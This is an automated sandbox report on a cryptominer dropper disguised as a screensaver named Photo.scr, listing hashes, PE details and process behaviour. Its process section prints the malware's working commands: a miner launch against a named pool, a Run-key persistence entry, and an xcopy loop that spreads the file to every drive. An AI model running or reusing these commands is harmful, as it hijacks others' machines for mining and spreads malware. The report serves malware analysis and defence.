General Info

File name

Photo.scr

Full analysis
https://app.any.run/tasks/73fe3010-1456-45c4-b745-274f3151df1e
Verdict
Malicious activity
Analysis date
3/14/2019, 19:44:11
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
miner
Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5

aba2d86ed17f587eb6d57e6c75f64f05

SHA1

aeccba64f4dd19033ac2226b4445faac05c88b76

SHA256

807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d

SSDEEP

24576:pWKqa4hnzP3w7L3rmZmpk7FSQFW2iJ+N07/TwYV1CdZdQ+4lT+iFgiGTtswAtdz:pSrwf3aZmpOFU2iQNIUc1LxGTtswgd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • NsCpuCNMiner32.exe (PID: 3308)
Looks like application has launched a miner
  • cmd.exe (PID: 2172)
  • Photo.scr (PID: 2956)
Changes the autorun value in the registry
  • reg.exe (PID: 2156)
Uses REG.EXE to modify Windows registry
  • cmd.exe (PID: 2968)
Executable content was dropped or overwritten
  • Photo.scr (PID: 2956)
Creates files in the user directory
  • Photo.scr (PID: 2956)
Dropped object may contain URLs of mainers pools
  • cmd.exe (PID: 2500)
Starts CMD.EXE for commands execution
  • Photo.scr (PID: 2956)

No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.exe
|   Win32 Executable MS Visual C++ (generic) (67.3%)
.dll
|   Win32 Dynamic Link Library (generic) (14.1%)
.exe
|   Win32 Executable (generic) (9.7%)
.exe
|   Generic Win/DOS Executable (4.3%)
.exe
|   DOS Executable Generic (4.3%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2016:02:06 22:24:54+01:00
PEType:
PE32
LinkerVersion:
2.23
CodeSize:
79872
InitializedDataSize:
1577472
UninitializedDataSize:
19456
EntryPoint:
0x12a0
OSVersion:
4
ImageVersion:
1
SubsystemVersion:
4
Subsystem:
Windows GUI
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
06-Feb-2016 21:24:54
Detected languages
English - United States
TLS Callbacks:
3 callback(s) detected.
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x00000080
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
9
Time date stamp:
06-Feb-2016 21:24:54
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_DEBUG_STRIPPED
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LINE_NUMS_STRIPPED
IMAGE_FILE_LOCAL_SYMS_STRIPPED
IMAGE_FILE_RELOCS_STRIPPED
Sections
Name Virtual Address Virtual Size Raw Size Charateristics Entropy
.text 0x00001000 0x000137D0 0x00013800 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_2048BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_8BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_CODE,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.10382
.data 0x00015000 0x00000464 0x00000600 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_2048BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_8BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 2.15393
.rdata 0x00016000 0x00002814 0x00002A00 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_2048BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_8BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 5.20732
.eh_fram\xf8\x03 0x00019000 0x000003F8 0x00000400 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.59707
.bss 0x0001A000 0x00004B4C 0x00000000 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_2048BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_8BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_UNINITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0
.idata 0x0001F000 0x00000D98 0x00000E00 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 5.20616
.CRT 0x00020000 0x0000001C 0x00000200 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0.170146
.tls 0x00021000 0x00000020 0x00000200 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0.210826
.rsrc 0x00022000 0x00169230 0x00169400 IMAGE_SCN_ALIGN_1024BYTES,IMAGE_SCN_ALIGN_16BYTES,IMAGE_SCN_ALIGN_1BYTES,IMAGE_SCN_ALIGN_256BYTES,IMAGE_SCN_ALIGN_2BYTES,IMAGE_SCN_ALIGN_32BYTES,IMAGE_SCN_ALIGN_4096BYTES,IMAGE_SCN_ALIGN_4BYTES,IMAGE_SCN_ALIGN_512BYTES,IMAGE_SCN_ALIGN_64BYTES,IMAGE_SCN_ALIGN_8192BYTES,IMAGE_SCN_ALIGN_MASK,IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 7.91453
Resources
1

2

3

4

5

6

7

8

9

10

RCDATA1

ICON1

Imports
    WININET.DLL

    KERNEL32.dll

    msvcrt.dll

    SHELL32.DLL

Exports

    No exports.

Screenshots

Processes

Total processes
95
Monitored processes
62
Malicious processes
1
Suspicious processes
0

Behavior graph

+
start photo.scr cmd.exe no specs cmd.exe no specs cmd.exe no specs nscpucnminer32.exe no specs reg.exe cmd.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs cmd.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs xcopy.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2956
CMD
"C:\Users\admin\AppData\Local\Temp\Photo.scr" /S
Path
C:\Users\admin\AppData\Local\Temp\Photo.scr
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\photo.scr
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
2172
CMD
"C:\Windows\System32\cmd.exe" /c start /b %TEMP%\NsCpuCNMiner32.exe -dbg -1 -o stratum+tcp://europe.cryptonight-hub.miningpoolhub.com:20596 -t 1 -u Wantinova.0 -p x
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
Photo.scr
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\nscpucnminer32.exe

PID
2500
CMD
"C:\Windows\System32\cmd.exe" /c (echo stratum+tcp://mine.moneropool.com:3333& echo stratum+tcp://monero.crypto-pool.fr:3333& echo stratum+tcp://xmr.prohash.net:7777& echo stratum+tcp://pool.minexmr.com:5555)> %TEMP%\pools.txt
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
Photo.scr
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2968
CMD
"C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /d "C:\Users\admin\AppData\Local\Temp\Photo.scr" /t REG_SZ /f
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
Photo.scr
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3308
CMD
C:\Users\admin\AppData\Local\Temp\NsCpuCNMiner32.exe -dbg -1 -o stratum+tcp://europe.cryptonight-hub.miningpoolhub.com:20596 -t 1 -u Wantinova.0 -p x
Path
C:\Users\admin\AppData\Local\Temp\NsCpuCNMiner32.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
3735929054
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\nscpucnminer32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2156
CMD
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /d "C:\Users\admin\AppData\Local\Temp\Photo.scr" /t REG_SZ /f
Path
C:\Windows\system32\reg.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Registry Console Tool
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3376
CMD
"C:\Windows\System32\cmd.exe" /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z) do xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" %i:\
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
Photo.scr
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\xcopy.exe

PID
3828
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" A:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2304
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" B:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3192
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" C:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\conhost.exe
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll

PID
3332
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" D:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3812
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" E:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2152
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" F:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2672
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" G:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
